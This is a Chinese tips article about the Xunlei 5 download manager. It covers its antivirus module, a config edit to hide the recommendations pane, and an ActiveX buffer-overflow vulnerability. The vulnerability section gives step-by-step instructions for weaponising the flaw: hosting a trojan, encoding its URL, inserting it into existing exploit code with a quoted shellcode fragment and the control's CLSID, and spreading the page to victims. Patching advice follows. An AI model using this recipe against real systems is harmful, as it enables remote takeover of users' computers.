网上病毒众多,一波未平,一波又起,所以我在下载东西时都要对下载文件进行安全检测。我发现迅雷提供的杀毒模块真的管用,能免费使用著名的杀毒软件卡巴斯基查杀病毒。
首先,我们运行迅雷,点击“组件→组件管理”命令打开组件管理窗口,接着启用迅雷安全下载组件。接着打开迅雷插件中心网页(http://plugin.xunl ei.com/ind ex.html)下载采用卡巴斯基杀毒引擎的杀毒模块并安装。然后,重启迅雷,点击“工具→配置”命令打开配置窗口会发现多出了“下载安全”标签。
进入该标签后,杀毒模块可以选择“卡巴斯基杀毒模块”,如果需要进一步对扫描和更新策略进行配置,可以进入“杀毒设置”,比如可以设置更新策略为“即时”,这样可以提高病毒库更新的速度。
你是否对迅雷附带的卡巴斯基模块杀毒能力抱有怀疑态度呢?那么,我们来下载一个常见的病毒来测试一下其功能吧。下载了一个病毒样本包,迅雷发现了5个病毒并提示删除文件,而通过卡巴斯基同样发现了5个病毒。
如何去掉迅雷的热门推荐
丸治:每次打开讯雷5的时候,都看得到界面里“热门推荐”这个栏目,不过我并不喜欢它。工具设置里没有相关的关闭法,董师傅能帮我想个好办法吗?www.sq120.com推荐文章
董师傅:你可以使用它的去广告版本,不过我们还是应该多多支持国产软件……其实,只要对迅雷的配置文件进行一些简单的修改即可达到目。
首先请完全退出迅雷程序,然后用记事本打开迅雷安装目录下的UserConfig.ini,如果你是将迅雷安装在默认路径下,那么这个文件应该是在C:\Program Files\Thunder Network\Thunder\Profiles\,我们需要修改的是“Pane1_Hide=0”的内容,但这个内容在UserConfig.ini文件的很多地方都存在,正确的应该是[Splitter_1]小节下,如图1所示带框处,然后将它修改为“Pane1_Hide=1”,退出时注意保存修改。
重新打开迅雷就可以看到图2所示的效果,现在你再也不会在右侧窗格看到原来的“热门推荐”栏目,当然什么时候需要它再次出现时,可以继续重置UserConfig.ini文件中的相应值,有这方面需求的朋友不妨一试。
迅雷有漏洞怎么办
昨天我到妹妹家玩,看到她在用迅雷5下载电影,不由得惊出一身冷汗。因为迅雷5最近爆出了一个高危漏洞,黑客利用它可以实现远程溢出,控制受害者的电脑,使其成为黑客的“肉鸡”。什么?你没有听说过这个漏洞?那就快看看本文,早点做好安全防护。
迅雷5 ActiveX控件可实现远程溢出
Web迅雷的高危漏洞才爆出没有多久,最近Web迅雷的老大哥,迅雷5也出现了一个高危的漏洞。经过测试发现,迅雷 5.6.9.344版本的ActiveX控件上存在多个缓冲区溢出漏洞,远程攻击者可以利用此漏洞控制用户系统。
经过我的试验,迅雷5中的DPClient.Vod.1 ActiveX控件文件,在处理传送给DownURL2()的参数的时候会造成数据溢出。这样如果用户受骗访问了恶意网页的话,就可能触发软件缓冲区溢出,会让远程攻击者执行任意指令。
恶意代码“攻陷” 迅雷5
第一步:首先配置一个木马的服务端程序,然后将它上传到自己的网络空间中,这样就得到了木马地址。现在我们对这个木马地址进行加密处理。在搜索引擎里面搜索“网页加密”,接着在搜索到的加密网站里面,比如http://www.cha88.cn/safe/shellcode.Php,输入木马地址后点击“Ascii→Unicode”即可。
第二步:现在配置迅雷漏洞的利用网页。由于没有现成的漏洞生成工具,因此只有修改网络中现成的漏洞代码。在源代码中有如下的一句信息:“%u6946%u656c%u0041%u7468%u7074此处为需要下载病毒的网址%u0000”,现在只需要将加密后的网页木马地址,复制到代码里面指定的位置就可以了。
稍微对网页木马了解的朋友一定注意到了,这段代码的风格和前段时间的《暴风影音Ⅱ》ActiveX栈溢出漏洞利用代码颇为相似,尾部都是为%u7468%u7074+此处为需要下载病毒的网址+%u0000,唯一的差别就是迅雷漏洞中ActiveX控件的CLSID为:EEDD6FF9-13DE-496B-9A1C-D78B3215E266。
第三步:漏洞利用的网页木马创建完成后,同样将它上传到网络空间中,然后利用即时通讯工具、电子邮件等方式将它传播出去。这样只要远程用户安装了迅雷5的话,只需要点击进入该木马链接,网页脚本就会自动激活迅雷的ActiveX漏洞,然后下载运行设定的木马程序。当成功连接远程木马后,就可以通过客户端执行相应的控制命令了。
防范技巧
目前迅雷公司已经推出了全新的迅雷5.7.3.389版,用户只需要及时更新到软件的最新版本,就可以避免成为黑客控制的肉鸡。
安装最新版本的《IE卫士》程序(软件下载地址:http://www.cpcw.com/bzsoft),通过防范网页木马的方式来保护系统。以后当访问含有迅雷漏洞的网页后,《IE卫士》就会弹出一个提示窗口(图3),告知用户有网页木马并且让用户进行适当的选择。
黑客猛挖应用软件漏洞
在黑客玩腻了系统漏洞以后,又将眼光瞄向了应用软件的漏洞,因此在今年一大批软件漏洞被黑客不断地挖掘出来。比如今天介绍的迅雷5漏洞,由于迅雷的使用面较广,再加上漏洞的利用形式是网页木马,因此会给用户造成巨大危害。用户平时除了关注系统漏洞以外,还需要进一步关注常用应用软件的漏洞,那些喜欢使用老版本软件的用户尤其要注意。
From:http://www.itcomputer.com.cn/Article/Network/201309/389.html